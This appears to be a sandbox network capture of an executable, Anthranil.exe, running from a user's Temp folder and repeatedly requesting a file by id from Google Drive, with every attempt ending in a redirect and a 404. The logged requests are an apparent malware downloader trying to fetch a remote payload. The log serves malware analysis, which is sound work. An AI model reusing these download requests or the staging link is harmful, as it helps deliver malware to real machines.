                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:44 GMT
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-sCQUuUjZhEpY9O8Zx7PTeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  Timestamp: 2025-01-11 04:29:44 UTC | Bytes transferred: 1652 | Direction: IN | Data Ascii:
                                                                                  <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yN-xvdwyMK1waV_bwIaqUg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49297 | Destination IP: 216.58.206.46 | Destination Port: 443 | PID: 6660 | Process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp: 2025-01-11 04:29:45 UTC | Bytes transferred: 422 | Direction: OUT | Data:
                                                                                  GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  Timestamp: 2025-01-11 04:29:46 UTC | Bytes transferred: 1920 | Direction: IN | Data:
                                                                                  HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:45 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-dG3tx_6FUzImPD2QOlkZLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49302 | Destination IP: 142.250.185.129 | Destination Port: 443 | PID: 6660 | Process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp: 2025-01-11 04:29:46 UTC | Bytes transferred: 464 | Direction: OUT | Data:
                                                                                  GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  Timestamp: 2025-01-11 04:29:47 UTC | Bytes transferred: 1851 | Direction: IN | Data:
                                                                                  HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgShivJ69ND35w3dJbu-kfuHY7HPtA2vpk3iP5ROtaXYfaeRrStXnKamEOy7XPkQyZfk5ENd6SE
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:46 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-7KwAU09EzDaMcOyRvIx1lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  Timestamp: 2025-01-11 04:29:47 UTC | Bytes transferred: 1652 | Direction: IN | Data Ascii:
                                                                                  <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AAKsYvzKezduRMzUHH5E2A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49312 | Destination IP: 216.58.206.46 | Destination Port: 443 | PID: 6660 | Process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp: 2025-01-11 04:29:47 UTC | Bytes transferred: 422 | Direction: OUT | Data:
                                                                                  GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  Timestamp: 2025-01-11 04:29:48 UTC | Bytes transferred: 1920 | Direction: IN | Data:
                                                                                  HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:48 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-8-sNm3Vej9T3eQlqqdoMVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49313 | Destination IP: 142.250.185.129 | Destination Port: 443 | PID: 6660 | Process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp: 2025-01-11 04:29:49 UTC | Bytes transferred: 464 | Direction: OUT | Data:
                                                                                  GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  Timestamp: 2025-01-11 04:29:49 UTC | Bytes transferred: 1844 | Direction: IN | Data:
                                                                                  HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgSeH1dNT61mN-VS3GHaYMELFq-9LTWkLHSh2GgvkPyB2eTqFfnXyp6lVVhAi4UWmy1T
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:49 GMT
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-4qJZgdpT07Uuhd1uYITnuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  Timestamp: 2025-01-11 04:29:49 UTC | Bytes transferred: 1652 | Direction: IN | Data Ascii:
                                                                                  <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KH27mAuK5X_GUsGTBHmmbg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49314 | Destination IP: 216.58.206.46 | Destination Port: 443 | PID: 6660 | Process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp: 2025-01-11 04:29:50 UTC | Bytes transferred: 422 | Direction: OUT | Data:
                                                                                  GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  Timestamp: 2025-01-11 04:29:50 UTC | Bytes transferred: 1920 | Direction: IN | Data:
                                                                                  HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:50 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-qqVxUNtUTRGLG0v7dZhyuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49315 | Destination IP: 142.250.185.129 | Destination Port: 443 | PID: 6660 | Process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp: 2025-01-11 04:29:51 UTC | Bytes transferred: 464 | Direction: OUT | Data:
                                                                                  GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  Timestamp: 2025-01-11 04:29:51 UTC | Bytes transferred: 1844 | Direction: IN | Data:
                                                                                  HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgRCCopv9kcEaAbDGGMxs6w84S9siUxAMjN4r7LgbOLjQavjH8APpCnyk2R5pzZMJghN
                                                                                  Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:51 GMT
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-fvsjmTXeHKtqQjIn6RSq5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-01-11 04:29:51 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 37 55 78 4d 6e 71 77 50 77 4e 67 35 48 56 47 42 59 67 34 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U7UxMnqwPwNg5HVGBYg4KQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49316 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:52 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:52 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:52 GMT
    Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-VmJJyD-IncLnuqb8uc2vGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49317 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:53 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:54 UTC | 1844 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFIdbgTO5zPYZIhjM4ikLP9B8xuEOay9YnrXi71GJvViiT33y4MN_kz4N7sJd55KcRJGB1qc
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:53 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-jr1iZeOWVIKXrfKJpGwY-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Cross-Origin-Opener-Policy: same-origin
